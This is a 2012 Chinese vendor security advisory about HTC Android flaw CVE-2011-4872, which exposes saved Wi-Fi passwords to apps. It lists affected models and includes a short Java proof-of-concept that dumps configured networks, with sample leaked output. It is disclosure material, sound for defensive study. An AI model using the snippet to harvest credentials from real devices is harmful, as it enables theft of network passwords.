金山手机卫士 

HTC Android手机漏洞或泄露WiFi密码

来源：金山安全中心　发布日期：2012-02-03

 

 

摘要：

据官方媒体报道：北京时间2月2日消息，宏达电（HTC）日前承认旗下部分手机处理特定Android请求的方式存在漏洞，该漏洞会暴露手机所连接的Wi-Fi网络的安全凭证。黑客可以利用这些漏洞获得手机Wi-Fi登录信息，会存在极大的安全风险。金山手机卫士率先推出此漏洞检测工具，看看您的手机是否有此漏洞？以保障手机安全。 快速下载检测

关键词：金山手机卫士 金山网络 HTC WiFi密码泄漏

 

--------------------------------------------------------------------------------------------------

 

据官方媒体报道：北京时间2月2日消息，宏达电（HTC）日前承认旗下部分手机处理特定Android请求的方式存在漏洞，该漏洞会暴露手机所连接的Wi-Fi网络的安全凭证。黑客可以利用这些漏洞获得手机Wi-Fi登录信息，会存在极大的安全风险。

 

研究人员克里斯·赫斯(Chris Hessing)及布雷特·乔丹(Bret Jordan)发现，在受影响的宏达电手机上，带有android.permission.ACCESS_WIFI_STATE权限的任何Android应用都能够调用WifiConfiguration上的.toString()指令，查看无线网络的所有安全认证。

 

如果结合android.permission.INTERNET权限，黑客就可以获得相关的详细信息，并通过互联网发至远程服务器。

 

宏达电于1月31日在其支持网站上发布公布，向用户警告这个漏洞的存在：“宏达电已经开发出一个补丁，修复部分宏达电手机上的一个WiFi小问题。大部分手机已经通过常规更新收到了这个补丁。但是，部分手机将需要手动下载以就行修复。请在下周了解更多有关这个补丁的信息，如果你需要更新自己的手机请进行手动下载。”

 

好消息是，大部分宏达电手机将自动通过打补丁修复这个漏洞，但是部分手机需要用户手动下载这个补丁。宏达电表示，用户应该在下周到官网了解更多详细信息。

 

建议您安装使用手机安全软件，经常查杀手机是否存在安全隐患，确保手机安全性。

快速下载金山手机卫士最新版

 

--------------------------------------------------------------------------------------------------

 

漏洞信息详情：

Bugtraq ID: 51790

CVE ID：CVE-2011-4872

CNCVE ID：CNCVE-20114872

 

漏洞起因：

设计错误

 

危险等级：

低

 

影响厂商：

HTC

 

受影响机型：

Desire HD-Versions FRG83D, GRI40（HTC A9191/Desire HD/G10/HTC 渴望）

Glacier-Version FRG83（HTC 冰川）

Droid Incredible-Version FRF91（Droid Incredible/HTC 不可思议）

Thunderbolt 4G-Version FRG83D（HTC 霹雳）

Sensation Z710e-Version GRI40（HTC金字塔/G14）

Sensation 4G-Version GRI40（HTC金字塔/G14 加长版）

Desire S-Version GRI40（HTC S510e/Desire S/G12 ）

EVO 3D-Version GRI40（HTC G17）

EVO 4G-Version GRI40（HTC G20）

Droid Incredible-Version FRF91 G11

 

不受影响版本：

Nexus One

 

漏洞细节：

在HTC受影响机型中，应用程序拥有android.permission.ACCESS_WIFI_STATE权限时，可通过调用WifiConfiguration.toString获取SSID及802.1X认证信息，攻击者可获得Wifi密码及加密方式。

如果此应用程序同时拥有android.permission.INTERNET权限，攻击者则可以收集Wifi密码信息并上传至远程服务器。在SSID有特殊意义时（如”office_xxxxxx”），此类攻击会造成更大影响。

 

漏洞验证代码：
StringBuilder sb = new StringBuilder();
                          
WifiManager wm = (WifiManager) getSystemService(Context.WIFI_SERVICE);
List <WifiConfiguration> wcs = wm.getConfiguredNetworks();

for (WifiConfiguration wc : wcs) {

       sb.append(wc.toString());
}

/////////////////////////////////////////////////////////////////////
未受影响机型password域会返回空，或者使用*填充。
* ID: 2 SSID: "ct" BSSID: null PRIO: 16
KeyMgmt: WPA_EAP IEEE8021X Protocols: WPA RSN
AuthAlgorithms:
PairwiseCiphers: CCMP
GroupCiphers: WEP40 WEP104 TKIP CCMP
PSK:
eap: PEAP
phase2: auth=MSCHAPV2
identity: [Your User Name]
anonymous_identity:
password:
client_cert:
private_key:
ca_cert: keystore://CACERT_ct

受影响机型会泄漏明文密码。
* ID: 0 SSID: "wpa2eap" BSSID: null PRIO: 21
KeyMgmt: WPA_EAP IEEE8021X Protocols: WPA RSN
AuthAlgorithms:
PairwiseCiphers: CCMP
GroupCiphers: WEP40 WEP104 TKIP CCMP
PSK:
eap: TTLS
phase2: auth=PAP
identity: test
anonymous_identity:
password: test
client_cert:
private_key:
ca_cert: keystore://CACERT_wpa2eap

 

 

相关链接：
http://www.kb.cert.org/vuls/id/763355
http://www.securityfocus.com/archive/1/521445/30/0/threaded